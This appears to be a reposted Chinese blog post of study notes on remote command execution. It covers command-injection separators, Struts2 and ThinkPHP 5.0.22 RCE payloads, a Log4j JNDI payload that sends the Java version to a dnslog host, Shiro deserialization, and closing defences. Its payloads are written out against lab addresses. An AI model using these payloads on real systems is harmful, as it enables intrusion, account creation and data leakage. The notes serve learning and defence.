命令执行(rce)

news2024/11/18 17:46:48

1.命令与代码执行原理

  • 命令执行原理

        参数给变量未经过滤,直接使用了不安全的函数处理了变量
            

127.0.0.1&&ipconfig   有漏洞

  • 常用的函数

            assert,system,exec,shell_exec, eval,``(反单引号)

  •     代码执行原理

        参数给变量未经过滤,直接使用了不安全的函数处理了变量,使用了eval函数
   可以执行代码

2.如何挖命令执行漏洞

(1)执行系统命令: assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号)
(2)代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
(3)文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
(4).htaccess: SetHandler, auto_prepend_file, auto_append_file 

3.命令执行一般出现那些地方

只要带参数的地方都可能出现命令执行漏洞
常见的路由器、防火墙、入侵检测、自动化运维平台 

4.测试方法(绕过方法)

  •  &&


            127.0.0.1&&ipconfig

 ​​​

  •     &

 过滤了&&可以使用&

127.0.0.1&ipconfig

  •     |

 127.0.0.1|ipconfig  后面的被执行

  •  || 

5.框架介绍

  • struts2框架

    1.怎么识别
        扩展名为.action和.do
        payload          apache.struts2
    2.使用的工具

对比工具的区别采用抓包放包的wse抓包
                        

2.struts2命令执行漏洞
s2-005、s2-009、s2-013、s2-016、s2-019、devmode、s2-032、s2-037、s2-045、s2-048、s2-052、s2-057

  • s2-045复现  

 dir /s c:\\*.jsp   查看文件路径/s是递归
                            

  • s2-046复现

   添加用户

 可以开3389远程连接

  •  s2-048复现

http://10.0.0.139:8090/struts2-showcase/integration/saveGangster.action

  • s2-058复现 

 <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />添加

 删掉这里

 把type="chain"改成type="redirectAction"

   http://10.0.0.139:8090/struts2-showcase/actionChain1.action  这个页面有漏洞

  • thinkphp5.0.22框架

  • 框架的搭建

        修改文件,在thinkphp目录搜索database.php文件配置数据库连接


        PHP5.4以上版本

  •     怎样知道对方的框架是thinkphp以及版本号

        http://10.0.0.139:92/thinkphp/public/index.php  拼接错误的

    http://10.0.0.139:92/thinkphp/public/index.php
     打开图标为一个笑脸就是thinkphp

     

  •     检测框架是否有漏洞

        使用bp里面的工具

读取文件

http://10.0.0.139:92/thinkphp//runtime/log/202309/20.log   日志信息泄露

 http://10.0.0.139:92/thinkphp/public//s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

http://10.0.0.139:92/thinkphp/public//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1 

  • apache log4j

    Apache Log4j是一个开放源码的Java日志记录库,主要可以帮助开发人员更轻松地控制日志级别,构建记录器,以及在多种日志目标之间转换,而无需修改日志消息。

  • 原理

由于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

  •     漏洞影响版本

        Apache Log4j 2.x <= 2.14.1

  •     攻击代码

        ${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn}  后面需要换    

  •     怎么挖漏洞

        在输入的地方登录的地方插入payload             ${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn}

  •     修复方案

       1. 升级到java8以上
        2.中间件按官网升级  ,升级了会自动移除对lookup功能的支持,默认就会禁用jndi的方法,移除log4j包中的jndilookup类 

  • apache   shiro(反序列化)

  •     搭建

        cat /etc/apt/sources.list


            apt-get update 
            apt-get install docker
            apt-get install docker-compose
            docker run -d -p 80:8080  medicean/vulapps:s_shiro_1
            http://10.0.0.131/

 webshell工具

  •  介绍

        Apache Shiro是一个功能强大且易于使用的 Java 安全框架,主要包含身份验证、授权、加密和会话管理等功能,可用于保护任何应用程序。

  • 原理

        shiro  550
         提供了记住我的功能(rememberme),用户登录成功后会生成经过加密并编码的cookie,在服务端接收cookie值后进行base64解码->ASE解码->反序列化。攻击者只要找到ase加密的密钥,就可以构造一个恶意对象,对其进行序列化->ASE加密->base64编码,然后将其作为cookie的rememberme字段发送,shirp将rememberme进行解密并且反序列化,最终造成反序列化漏洞
        shirp  721
       由于apache  siro cookie  中通过ase-128-cbc模式加密的rememberme字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行

  •     受影响版本区别

        shiro  550      apache   shiro  <  1.2.4   ase加密的密钥泄露,造成了这个漏洞
        shiro  721      apache   shiro  <  1.4.2    rememberme字段出现问题

  •     怎么判断apache  shiro 框架

        burp抓包有  rememberme    和   deleteme

  •     攻击工具

        shiroattack    ,   shiroexp

  •     修复方案

        升级shiro至最新版本1.7.1
        保持shiro版本不变,修改rememberme默认密钥
        禁用rememberme 默认密钥 

6.防御

1. 配置好php相关参数
通过Php配置文件里面有个disable_functions = 配置,禁止某些php函数,
例如:disable_functions =system,passthru,shell_exec,exec,popen
便禁止了用这些函数来执行系统命令
2.升级中间件
3.参数给变量严格过滤,把参数写死。如果填入ip地址,以点作为切割判断是不是四段 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1039734.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Windows如何将软件安装在移动硬盘上?

为什么要在Windows的移动硬盘上安装软件&#xff1f; 现在一些软件需要占用的硬盘空间越来越多&#xff0c;我们下载的软件也越来越多&#xff0c;硬盘的可用存储空间自然的也就越来越小了。当您在下载新软件时&#xff0c;就会提示您磁盘空间不足&#xff0c;但又不能删除之…

AIGC专栏7——EasyPhoto 人像训练与生成原理详解

AIGC专栏7——EasyPhoto 人像训练与生成原理详解 学习前言源码下载地址为什么是LoraEasyPhoto的训练流程1、数据的预处理a、人像排序i、人脸特征向量提取过程ii、人脸偏移角度计算iii、人像排序 b、人像分割与修复i、人像分割ii、图像修复与超分处理 2、Lora模型训练a、训练的基…

PyTorch实战:常用卷积神经网络搭建结构速览

目录 前言 常用卷积神经网络 1.AlexNet 2.VGGNet 3.GoogLeNet 4.ResNet 总览 前言 PyTorch可以说是三大主流框架中最适合初学者学习的了&#xff0c;相较于其他主流框架&#xff0c;PyTorch的简单易用性使其成为初学者们的首选。这样我想要强调的一点是&#xff0c;框架…

收藏!一个详细完整的公司局域网搭建案例

你们好&#xff0c;我的网工朋友。 什么是局域网&#xff1f; 所谓局域网(Local Area Network&#xff0c;简称LAN)&#xff0c;就是用于将有限范围内&#xff08;例如一个实验室、一层办公楼或者校园&#xff09;的各种计算机、终端与外部设备互联成网。 那公司局域网怎么建…

ScrollView如何裁剪粒子特效

1&#xff09;ScrollView如何裁剪粒子特效 2&#xff09;Unreal在移动设备中无法使用Stat命令获取到GPU Thread的耗时 3&#xff09;Unity中如何看到相机视野范围内的剔除结果 这是第354篇UWA技术知识分享的推送&#xff0c;精选了UWA社区的热门话题&#xff0c;涵盖了UWA问答、…

Spring Cloud Alibaba Gateway 简单使用

文章目录 Spring Cloud Alibaba Gateway1.Gateway简介2. 流量网关和服务网关的区别3. Spring Cloud Gateway 网关的搭建3.1 Spring Cloud Gateway 配置项的说明3.2 依赖导入3.3 配置文件 Spring Cloud Alibaba Gateway 1.Gateway简介 Spring Cloud Gateway是一个基于Spring F…

图片分割处理(以玉米颗粒的图片分割为例)

问题&#xff1a; 为完成玉米颗粒分类任务&#xff0c;现需要处理训练图片&#xff0c;将以下图片中的玉米颗粒进行分割&#xff1a; 目标&#xff1a; 操作步骤&#xff08;完整代码附在最后&#xff0c;该部分为解释说明&#xff09; 一、提取通道并进行二值化 # 提取蓝…

CCC数字钥匙设计【BLE】 --建立安全测距

1、建立安全测距Establish Secure Ranging 车端总共有三种建立安全测距的方式&#xff0c;具体如下&#xff1a; 1) Optimal Flow 2) Sub-Optimal Flow 3) Ranging Recovery Flow 为了确定建立安全测距需要执行哪条流程&#xff0c;车辆需要进行以下流程选择。当车辆和设备…

速码!!BGP最全学习笔记:BGP路径属性与选路原则

BGP路径属性 1、路径属性分类 公认属性&#xff1a;所有BGP路由器都必须能够识别的属性 公认必遵&#xff08;Well-known Mandatory&#xff09;&#xff1a;必须包括在每个Update消息里。公认任意&#xff08;Well-known Discretionary&#xff09;&#xff1a;可能包括在某…

数学公式测试

MVP变换 MVP变换用来描述视图变换的任务&#xff0c;即将虚拟世界中的三维物体映射&#xff08;变换&#xff09;到二维坐标中。 MVP变换分为三步&#xff1a; 模型变换(model tranformation)&#xff1a;将模型空间转换到世界空间&#xff08;找个好的地方&#xff0c;把所…

4年北漂之路,从软件测试外包到外企的一点小心得

4年前&#xff0c;我独自一人拖着行李箱来到了北京&#xff0c;成为了一名北漂&#xff0c;离开了校园的庇护&#xff0c;只身一人想要在这片陌生的地方闯出一番名堂&#xff0c;可最后却不得人意&#xff0c;面临着和所有北漂群体的共同困局&#xff0c;没有任何归属感&#x…

【Python Fastapi】js上传文件,fastapi处理,js显示回传信息

python from fastapi import FastAPI, File, UploadFile, HTTPException from fastapi.staticfiles import StaticFiles from fastapi.responses import HTMLResponse from typing import List import requestsapp FastAPI()# 配置静态文件目录 app.mount("/static"…

C++程序员,想入坑音视频方向,需要掌握那些技能树?

C程序员&#xff0c;想入坑音视频方向&#xff0c;需要掌握那些技能树? “音视频”方向太笼统了。 最核心的技术包括编码理论&#xff0c;从基础开始就是信号处理&#xff0c;傅里叶变换&#xff0c;DCT, 采样量化插值等等。这些和C没啥关系&#xff0c;就是一套数学理论。 …

工作薄代码之将活动工作表复制到新工作簿等

【分享成果&#xff0c;随喜正能量】得失&#xff0c;可以说是人类事业上的考验&#xff0c;不要因一时的得失影响一生的期许。得失是一时的&#xff0c;理想是一生的。。 我给VBA下的定义&#xff1a;VBA是个人小型自动化处理的有效工具。可以大大提高自己的劳动效率&#xf…

基于SpringBoot的企业客户管理系统

目录 前言 一、技术栈 二、系统功能介绍 管理员功能模块 员工功能模块 三、核心代码 1、登录模块 2、文件上传模块 3、代码封装 前言 本论文主要论述了如何使用JAVA语言开发一个企业客户管理系统&#xff0c;本系统将严格按照软件开发流程进行各个阶段的工作&#xff0c…

JVM堆内存转储

堆转储是 JVM 中特定时刻内存中的所有对象的快照。它们对于解决内存泄漏问题并优化 Java 应用程序中的内存使用情况非常有用。 堆转储通常以二进制格式 hprof 文件存储。我们可以使用 jhat 或 JVisualVM 等工具打开和分析这些文件。 下面介绍两种堆转储的方式&#xff1a; 1…

HTTP 请求轻松搞定:Swift 网络编程的不二之选 | 开源日报 No.38

Alamofire/Alamofire Stars: 39.8k License: MIT Alamofire 是一个用 Swift 编写的 HTTP 网络库。 简洁的语法和强大的功能集&#xff0c;让你仅需几行代码就能实现诸如自动重试等强大特性。支持链式请求/响应方法&#xff0c;使得处理网络请求变得如丝般顺滑。完美兼容 Swif…

前端性能测试工具-lighthouse

Lighthouse简介 Lighthouse 是 Google 的一款开源工具&#xff0c;它可以作为一个 Chrome 扩展程序运行&#xff0c;或从命令行运行。只需要给 Lighthouse 提供一个要审查的网址&#xff0c;它将针对此页面运行一连串的测试&#xff0c;然后生成一个页面性能的报告。 Lightho…

【电子通识】办法总比问题多:立式贴片座子整形成卧式

最近在测试一些和电池有关的项目&#xff0c;因为这个电池接口是没有用过的&#xff0c;以前做的一些接口板上没有兼容&#xff0c;导致不方便测试。 拿到座子后发现这个座子是立式贴片的。 但是不方便我做测试接口板工装&#xff0c;因为已经有一个立工座子了&#xff0c;再焊…

多个pdf合并成一个文件,3个方法合并pdf

如何把多个pdf合并成一个文件&#xff1f;在我们日常的工作中&#xff0c;经常会遇到一些需要处理的文件&#xff0c;其中包括PDF文件。特别是当我们需要将多个PDF文件合并成一个PDF文件时&#xff0c;会面临一些困难。这样的情况下&#xff0c;我们的阅读能力会受到限制&#…